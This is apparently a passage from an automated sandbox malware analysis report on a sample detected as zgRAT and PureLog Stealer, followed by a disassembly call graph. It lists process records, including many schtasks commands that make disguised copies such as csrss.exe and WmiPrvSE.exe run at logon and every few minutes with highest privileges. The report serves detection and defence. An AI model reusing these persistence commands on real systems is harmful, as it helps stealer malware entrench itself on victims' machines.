                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 88%, ReversingLabs
                                    • Detection: 55%, Virustotal, Browse
                                    Has exited:false

                                    General

                                    Target ID:17
                                    Start time:09:45:34
                                    Start date:25/08/2024
                                    Path:C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files (x86)\google\yxeaYbTPMzNPCanFqSswYWhX.exe"
                                    Imagebase:0x8d0000
                                    File size:1'961'472 bytes
                                    MD5 hash:84072063FC067434706597D88E3252A9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:18
                                    Start time:09:45:34
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Blockcomcrt\WmiPrvSE.exe'" /f
                                    Imagebase:0x7ff783760000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:19
                                    Start time:09:45:34
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Blockcomcrt\WmiPrvSE.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff783760000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:20
                                    Start time:09:45:35
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 11 /tr "'C:\Blockcomcrt\WmiPrvSE.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff783760000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:21
                                    Start time:09:45:35
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Recovery\csrss.exe'" /f
                                    Imagebase:0x7ff783760000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:22
                                    Start time:09:45:35
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\csrss.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff783760000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:23
                                    Start time:09:45:35
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Recovery\csrss.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff783760000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:24
                                    Start time:09:45:35
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Users\Default\Recent\StartMenuExperienceHost.exe'" /f
                                    Imagebase:0x7ff783760000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:25
                                    Start time:09:45:35
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Users\Default\Recent\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff783760000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:26
                                    Start time:09:45:35
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 8 /tr "'C:\Users\Default\Recent\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff783760000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:27
                                    Start time:09:45:35
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "yxeaYbTPMzNPCanFqSswYWhXy" /sc MINUTE /mo 7 /tr "'C:\Recovery\yxeaYbTPMzNPCanFqSswYWhX.exe'" /f
                                    Imagebase:0x7ff783760000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:28
                                    Start time:09:45:35
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "yxeaYbTPMzNPCanFqSswYWhX" /sc ONLOGON /tr "'C:\Recovery\yxeaYbTPMzNPCanFqSswYWhX.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff783760000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:29
                                    Start time:09:45:35
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "yxeaYbTPMzNPCanFqSswYWhXy" /sc MINUTE /mo 10 /tr "'C:\Recovery\yxeaYbTPMzNPCanFqSswYWhX.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff783760000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:30
                                    Start time:09:45:35
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "AgentMonitorA" /sc MINUTE /mo 11 /tr "'C:\Blockcomcrt\AgentMonitor.exe'" /f
                                    Imagebase:0x7ff783760000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:31
                                    Start time:09:45:35
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "AgentMonitor" /sc ONLOGON /tr "'C:\Blockcomcrt\AgentMonitor.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff783760000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:32
                                    Start time:09:45:35
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "AgentMonitorA" /sc MINUTE /mo 12 /tr "'C:\Blockcomcrt\AgentMonitor.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff783760000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:33
                                    Start time:09:45:35
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\elmTxMluu5.bat"
                                    Imagebase:0x7ff63a1b0000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:34
                                    Start time:09:45:36
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff6ee680000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:35
                                    Start time:09:45:36
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\chcp.com
                                    Wow64 process (32bit):false
                                    Commandline:chcp 65001
                                    Imagebase:0x7ff7bcc90000
                                    File size:14'848 bytes
                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:36
                                    Start time:09:45:36
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\w32tm.exe
                                    Wow64 process (32bit):false
                                    Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Imagebase:0x7ff785fa0000
                                    File size:108'032 bytes
                                    MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:37
                                    Start time:09:45:37
                                    Start date:25/08/2024
                                    Path:C:\Blockcomcrt\AgentMonitor.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Blockcomcrt\AgentMonitor.exe
                                    Imagebase:0xc10000
                                    File size:1'961'472 bytes
                                    MD5 hash:84072063FC067434706597D88E3252A9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:38
                                    Start time:09:45:37
                                    Start date:25/08/2024
                                    Path:C:\Blockcomcrt\AgentMonitor.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Blockcomcrt\AgentMonitor.exe
                                    Imagebase:0x8e0000
                                    File size:1'961'472 bytes
                                    MD5 hash:84072063FC067434706597D88E3252A9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:39
                                    Start time:09:45:37
                                    Start date:25/08/2024
                                    Path:C:\Recovery\csrss.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Recovery\csrss.exe
                                    Imagebase:0xc20000
                                    File size:1'961'472 bytes
                                    MD5 hash:84072063FC067434706597D88E3252A9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\csrss.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\csrss.exe, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 88%, ReversingLabs
                                    • Detection: 55%, Virustotal, Browse
                                    Has exited:true

                                    General

                                    Target ID:40
                                    Start time:09:45:37
                                    Start date:25/08/2024
                                    Path:C:\Recovery\csrss.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Recovery\csrss.exe
                                    Imagebase:0x650000
                                    File size:1'961'472 bytes
                                    MD5 hash:84072063FC067434706597D88E3252A9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    General

                                    Target ID:45
                                    Start time:09:45:41
                                    Start date:25/08/2024
                                    Path:C:\Blockcomcrt\WmiPrvSE.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Blockcomcrt\WmiPrvSE.exe"
                                    Imagebase:0x520000
                                    File size:1'961'472 bytes
                                    MD5 hash:84072063FC067434706597D88E3252A9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Blockcomcrt\WmiPrvSE.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Blockcomcrt\WmiPrvSE.exe, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 88%, ReversingLabs
                                    • Detection: 55%, Virustotal, Browse
                                    Has exited:true

                                    Disassembly

                                    Reset < >

                                      Execution Graph

                                      Execution Coverage:6.2%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:21%
                                      Total number of Nodes:1073
                                      Total number of Limit Nodes:67
                                      execution_graph 42183 50b7e0 42184 50b7ea __EH_prolog 42183->42184 42334 4f1316 42184->42334 42187 50b82a 42191 50b838 42187->42191 42192 50b89b 42187->42192 42261 50b841 42187->42261 42188 50bf0f 42381 50d69e 42188->42381 42196 50b878 42191->42196 42197 50b83c 42191->42197 42195 50b92e GetDlgItemTextW 42192->42195 42200 50b8b1 42192->42200 42193 50bf38 42198 50bf41 SendDlgItemMessageW 42193->42198 42199 50bf52 GetDlgItem SendMessageW 42193->42199 42194 50bf2a SendMessageW 42194->42193 42195->42196 42201 50b96b 42195->42201 42202 50b95f EndDialog 42196->42202 42196->42261 42206 4fe617 7 API calls 42197->42206 42197->42261 42198->42199 42398 50a64d 42199->42398 42205 4fe617 7 API calls 42200->42205 42203 50b980 GetDlgItem 42201->42203 42331 50b974 42201->42331 42202->42261 42207 50b994 SendMessageW SendMessageW 42203->42207 42208 50b9b7 SetFocus 42203->42208 42210 50b8ce SetDlgItemTextW 42205->42210 42211 50b85b 42206->42211 42207->42208 42214 50b9c7 42208->42214 42224 50b9e0 42208->42224 42215 50b8d9 42210->42215 42417 4f124f SHGetMalloc 42211->42417 42212 50bfa5 SetWindowTextW 42400 50abab GetClassNameW 42212->42400 42213 50bf9f 42213->42212 42219 4fe617 7 API calls 42214->42219 42221 50b8e6 GetMessageW 42215->42221 42215->42261 42217 50be55 42220 4fe617 7 API calls 42217->42220 42223 50b9d1 42219->42223 42226 50be65 SetDlgItemTextW 42220->42226 42227 50b8fd IsDialogMessageW 42221->42227 42221->42261 42418 50d4d4 42223->42418 42233 4fe617 7 API calls 42224->42233 42225 50c1fc SetDlgItemTextW 42225->42261 42230 50be79 42226->42230 42227->42215 42231 50b90c TranslateMessage DispatchMessageW 42227->42231 42235 4fe617 7 API calls 42230->42235 42231->42215 42234 50ba17 42233->42234 42239 4f4092 _swprintf 5 API calls 42234->42239 42265 50be9c _wcslen 42235->42265 42236 50bff0 42238 50c020 42236->42238 42242 4fe617 7 API calls 42236->42242 42237 50c73f 30 API calls 42237->42236 42247 50c73f 30 API calls 42238->42247 42295 50c0d8 42238->42295 42243 50ba29 42239->42243 42240 50b9d9 42344 4fa0b1 42240->42344 42245 50c003 SetDlgItemTextW 42242->42245 42246 50d4d4 16 API calls 42243->42246 42253 4fe617 7 API calls 42245->42253 42246->42240 42254 50c03b 42247->42254 42248 50c18b 42249 50c194 EnableWindow 42248->42249 42250 50c19d 42248->42250 42249->42250 42255 50c1ba 42250->42255 42436 4f12d3 GetDlgItem EnableWindow 42250->42436 42251 50beed 42257 4fe617 7 API calls 42251->42257 42256 50c017 SetDlgItemTextW 42253->42256 42262 50c04d 42254->42262 42280 50c072 42254->42280 42260 50c1e1 42255->42260 42268 50c1d9 SendMessageW 42255->42268 42256->42238 42257->42261 42258 50c0cb 42264 50c73f 30 API calls 42258->42264 42260->42261 42270 4fe617 7 API calls 42260->42270 42434 509ed5 8 API calls 42262->42434 42263 50c1b0 42437 4f12d3 GetDlgItem EnableWindow 42263->42437 42264->42295 42265->42251 42271 4fe617 7 API calls 42265->42271 42268->42260 42269 50bd56 42355 4f12f1 GetDlgItem ShowWindow 42269->42355 42276 50b862 42270->42276 42277 50bed0 42271->42277 42272 50ba87 42287 50bb20 42272->42287 42290 4f4092 _swprintf 5 API calls 42272->42290 42313 50bb11 42272->42313 42273 50c066 42273->42280 42275 50bcfb 42279 4fe617 7 API calls 42275->42279 42276->42225 42276->42261 42282 4f4092 _swprintf 5 API calls 42277->42282 42278 50c169 42435 509ed5 8 API calls 42278->42435 42284 50bd05 42279->42284 42280->42258 42285 50c73f 30 API calls 42280->42285 42281 50bd66 42356 4f12f1 GetDlgItem ShowWindow 42281->42356 42282->42251 42291 4f4092 _swprintf 5 API calls 42284->42291 42292 50c0a0 42285->42292 42287->42275 42333 50bc3f __InternalCxxFrameHandler 42287->42333 42428 4ff28c 23 API calls 42287->42428 42288 4fe617 7 API calls 42288->42295 42289 50c188 42289->42248 42296 50bac7 42290->42296 42297 50bd23 42291->42297 42292->42258 42298 50c0a9 DialogBoxParamW 42292->42298 42293 50bd70 42299 4fe617 7 API calls 42293->42299 42295->42248 42295->42278 42295->42288 42351 4f966e 42296->42351 42305 4fe617 7 API calls 42297->42305 42298->42196 42298->42258 42301 50bd7a SetDlgItemTextW 42299->42301 42300 50bb5f 42302 4f4092 _swprintf 5 API calls 42300->42302 42357 4f12f1 GetDlgItem ShowWindow 42301->42357 42317 50bb81 42302->42317 42308 50bd3d 42305->42308 42306 50bd8c SetDlgItemTextW GetDlgItem 42309 50bdc1 42306->42309 42310 50bda9 GetWindowLongW SetWindowLongW 42306->42310 42307 50baed 42311 4f959a 25 API calls 42307->42311 42358 50c73f 42309->42358 42310->42309 42311->42313 42313->42269 42313->42287 42315 50c73f 30 API calls 42316 50bddd 42315->42316 42369 50da52 42316->42369 42317->42333 42429 50b425 SHGetMalloc 42317->42429 42321 50bc10 42430 50b425 SHGetMalloc 42321->42430 42322 50c73f 30 API calls 42329 50be03 42322->42329 42324 50bc1c 42431 50b425 SHGetMalloc 42324->42431 42326 50be2c 42433 4f12d3 GetDlgItem EnableWindow 42326->42433 42327 50bc28 42432 4ff3fa 23 API calls 2 library calls 42327->42432 42329->42326 42332 50c73f 30 API calls 42329->42332 42331->42196 42331->42217 42332->42326 42333->42196 42333->42275 42335 4f131f 42334->42335 42336 4f1378 42334->42336 42337 4f1385 42335->42337 42438 4fe2e8 15 API calls 2 library calls 42335->42438 42439 4fe2c1 GetWindowLongW SetWindowLongW 42336->42439 42337->42187 42337->42188 42337->42261 42340 4f1341 42340->42337 42341 4f1354 GetDlgItem 42340->42341 42341->42337 42342 4f1364 42341->42342 42342->42337 42343 4f136a SetWindowTextW 42342->42343 42343->42337 42347 4fa0bb 42344->42347 42345 4fa14c 42346 4fa2b2 4 API calls 42345->42346 42348 4fa175 42345->42348 42346->42348 42347->42345 42347->42348 42440 4fa2b2 42347->42440 42350 50ac04 SetCurrentDirectoryW 42348->42350 42350->42272 42352 4f9678 42351->42352 42353 4f96d5 CreateFileW 42352->42353 42354 4f96c9 42352->42354 42353->42354 42354->42307 42355->42281 42356->42293 42357->42306 42366 50c749 _abort _wcslen __EH_prolog _wcsrchr 42358->42366 42359 50bdcf 42359->42315 42360 50ca67 SetWindowTextW 42360->42366 42362 513e3e 2 API calls 42362->42366 42364 50cc31 GetDlgItem SetWindowTextW SendMessageW 42364->42366 42366->42359 42366->42360 42366->42362 42366->42364 42367 50cc71 SendMessageW 42366->42367 42368 4f4092 _swprintf 5 API calls 42366->42368 42452 4fb991 5 API calls 3 library calls 42366->42452 42453 4fa5d1 FindFirstFileW FindFirstFileW 42366->42453 42454 50b48e 23 API calls 2 library calls 42366->42454 42367->42366 42368->42366 42370 50da5c __EH_prolog 42369->42370 42455 500659 42370->42455 42372 50da8d 42459 4f5b3d 42372->42459 42374 50daab 42463 4f7b0d 42374->42463 42378 50dafe 42479 4f7b9e 42378->42479 42380 50bdee 42380->42322 42382 50d6a8 42381->42382 42383 50a5c6 4 API calls 42382->42383 42384 50d6ad 42383->42384 42385 50d6b5 GetWindow 42384->42385 42386 50bf15 42384->42386 42385->42386 42388 50d6d5 42385->42388 42386->42193 42386->42194 42387 50d6e2 GetClassNameW 42387->42388 42388->42386 42388->42387 42389 50d706 GetWindowLongW 42388->42389 42390 50d76a GetWindow 42388->42390 42389->42390 42391 50d716 SendMessageW 42389->42391 42390->42386 42390->42388 42391->42390 42392 50d72c GetObjectW 42391->42392 42935 50a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 42392->42935 42394 50d743 42936 50a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 42394->42936 42937 50a80c 8 API calls 42394->42937 42397 50d754 SendMessageW DeleteObject 42397->42390 42399 50a65b GetDlgItem 42398->42399 42399->42212 42399->42213 42401 50abf1 42400->42401 42402 50abcc 42400->42402 42404 50b093 42401->42404 42402->42401 42403 50abe3 FindWindowExW 42402->42403 42403->42401 42405 50b09d __EH_prolog 42404->42405 42406 4f13dc 25 API calls 42405->42406 42407 50b0bf 42406->42407 42938 4f1fdc 42407->42938 42410 50b0d9 42412 4f1692 25 API calls 42410->42412 42411 50b0eb 42413 4f19af 27 API calls 42411->42413 42414 50b0e4 42412->42414 42416 50b10d __InternalCxxFrameHandler ___std_exception_copy 42413->42416 42414->42236 42414->42237 42415 4f1692 25 API calls 42415->42414 42416->42415 42417->42276 42946 50b568 PeekMessageW 42418->42946 42421 50d502 42425 50d50d ShowWindow SendMessageW SendMessageW 42421->42425 42422 50d536 SendMessageW SendMessageW 42423 50d591 SendMessageW SendMessageW SendMessageW 42422->42423 42424 50d572 42422->42424 42426 50d5c4 SendMessageW 42423->42426 42427 50d5e7 SendMessageW 42423->42427 42424->42423 42425->42422 42426->42427 42427->42240 42428->42300 42429->42321 42430->42324 42431->42327 42432->42333 42433->42331 42434->42273 42435->42289 42436->42263 42437->42255 42438->42340 42439->42337 42441 4fa2bf 42440->42441 42442 4fa2e3 42441->42442 42443 4fa2d6 CreateDirectoryW 42441->42443 42444 4fa231 2 API calls 42442->42444 42443->42442 42445 4fa2e9 42443->42445 42444->42445 42446 4fa325 42445->42446 42448 4fa4ed 42445->42448 42446->42347 42449 50ec50 42448->42449 42450 4fa4fa SetFileAttributesW 42449->42450 42451 4fa510 42450->42451 42451->42446 42452->42366 42453->42366 42454->42366 42456 500666 _wcslen 42455->42456 42483 4f17e9 42456->42483 42458 50067e 42458->42372 42460 500659 _wcslen 42459->42460 42461 4f17e9 23 API calls 42460->42461 42462 50067e 42461->42462 42462->42374 42464 4f7b17 __EH_prolog 42463->42464 42500 4fce40 42464->42500 42466 4f7b32 42467 50eb38 UnhandledExceptionFilter 42466->42467 42468 4f7b5c 42467->42468 42506 504a76 42468->42506 42471 4f7c7d 42472 4f7c87 42471->42472 42474 4f7cf1 42472->42474 42534 4fa56d 42472->42534 42476 4f7d50 42474->42476 42513 4f8284 42474->42513 42475 4f7d92 42475->42378 42476->42475 42540 4f138b 23 API calls 42476->42540 42480 4f7bac 42479->42480 42482 4f7bb3 42479->42482 42481 502297 23 API calls 42480->42481 42481->42482 42484 4f17ff 42483->42484 42495 4f185a __InternalCxxFrameHandler 42483->42495 42485 4f1828 42484->42485 42496 4f6c36 23 API calls __vswprintf_c_l 42484->42496 42486 4f1887 42485->42486 42492 4f1847 ___std_exception_copy 42485->42492 42488 513e3e 2 API calls 42486->42488 42491 4f188e 42488->42491 42489 4f181e 42497 4f6ca7 23 API calls 42489->42497 42491->42495 42499 4f6ca7 23 API calls 42491->42499 42492->42495 42498 4f6ca7 23 API calls 42492->42498 42495->42458 42496->42489 42497->42485 42498->42495 42499->42495 42501 4fce4a __EH_prolog 42500->42501 42502 50eb38 UnhandledExceptionFilter 42501->42502 42504 4fce8d 42502->42504 42503 50eb38 UnhandledExceptionFilter 42505 4fceb1 42503->42505 42504->42503 42505->42466 42507 504a80 __EH_prolog 42506->42507 42508 50eb38 UnhandledExceptionFilter 42507->42508 42509 504a9c 42508->42509 42510 4f7b8b 42509->42510 42512 500e46 23 API calls 42509->42512 42510->42471 42512->42510 42514 4f828e __EH_prolog 42513->42514 42541 4f13dc 42514->42541 42516 4f82aa 42517 4f82bb 42516->42517 42687 4f9f42 42516->42687 42520 4f82f2 42517->42520 42549 4f1a04 42517->42549 42678 4f1692 42520->42678 42524 4f83a3 42525 4f83e8 42524->42525 42571 501b66 42524->42571 42574 4f1f6d 42525->42574 42528 4f83f3 42528->42520 42578 4f3b2d 42528->42578 42590 4f848e 42528->42590 42530 4fa56d 3 API calls 42531 4f82ee 42530->42531 42531->42520 42531->42530 42533 4f8389 42531->42533 42568 4f8430 42533->42568 42535 4fa582 42534->42535 42539 4fa5b0 42535->42539 42929 4fa69b 42535->42929 42537 4fa592 42538 4fa597 FindClose 42537->42538 42537->42539 42538->42539 42539->42472 42540->42475 42542 4f13e6 __EH_prolog 42541->42542 42543 4fce40 UnhandledExceptionFilter 42542->42543 42544 4f1419 42543->42544 42545 50eb38 UnhandledExceptionFilter 42544->42545 42548 4f1474 _abort 42544->42548 42546 4f1461 42545->42546 42546->42548 42691 4fb505 42546->42691 42548->42516 42550 4f1a0e __EH_prolog 42549->42550 42562 4f1a61 42550->42562 42565 4f1b9b 42550->42565 42710 4f13ba 42550->42710 42552 4f1bc7 42713 4f138b 23 API calls 42552->42713 42555 4f3b2d 25 API calls 42559 4f1c12 42555->42559 42556 4f1bd4 42556->42555 42556->42565 42557 4f1c5a 42561 4f1c8d 42557->42561 42557->42565 42714 4f138b 23 API calls 42557->42714 42559->42557 42560 4f3b2d 25 API calls 42559->42560 42560->42559 42561->42565 42566 4f9e80 24 API calls 42561->42566 42562->42552 42562->42556 42562->42565 42563 4f3b2d 25 API calls 42564 4f1cde 42563->42564 42564->42563 42564->42565 42565->42531 42566->42564 42567 4f9e80 24 API calls 42567->42562 42732 4fcf3d 42568->42732 42570 4f8440 42570->42524 42740 50de6b 42571->42740 42575 4f1f77 __EH_prolog 42574->42575 42577 4f1fa6 42575->42577 42748 4f19af 42575->42748 42577->42528 42579 4f3b3d 42578->42579 42580 4f3b39 42578->42580 42589 4f9e80 24 API calls 42579->42589 42580->42528 42581 4f3b4f 42582 4f3b6a 42581->42582 42583 4f3b78 42581->42583 42584 4f3baa 42582->42584 42857 4f32f7 25 API calls 2 library calls 42582->42857 42858 4f286b 25 API calls 3 library calls 42583->42858 42584->42528 42587 4f3b76 42587->42584 42859 4f20d7 23 API calls 42587->42859 42589->42581 42591 4f8498 __EH_prolog 42590->42591 42594 4f84d5 42591->42594 42601 4f8513 42591->42601 42882 508c8d 25 API calls 42591->42882 42593 4f84f5 42595 4f851c 42593->42595 42596 4f84fa 42593->42596 42594->42593 42599 4f857a 42594->42599 42594->42601 42595->42601 42884 508c8d 25 API calls 42595->42884 42596->42601 42883 4f7a0d 35 API calls 42596->42883 42599->42601 42860 4f5d1a 42599->42860 42601->42528 42602 4f8605 42602->42601 42866 4f8167 42602->42866 42605 4f8797 42606 4fa56d 3 API calls 42605->42606 42607 4f8802 42605->42607 42606->42607 42872 4f7c0d 42607->42872 42609 4fd051 23 API calls 42615 4f885d 42609->42615 42610 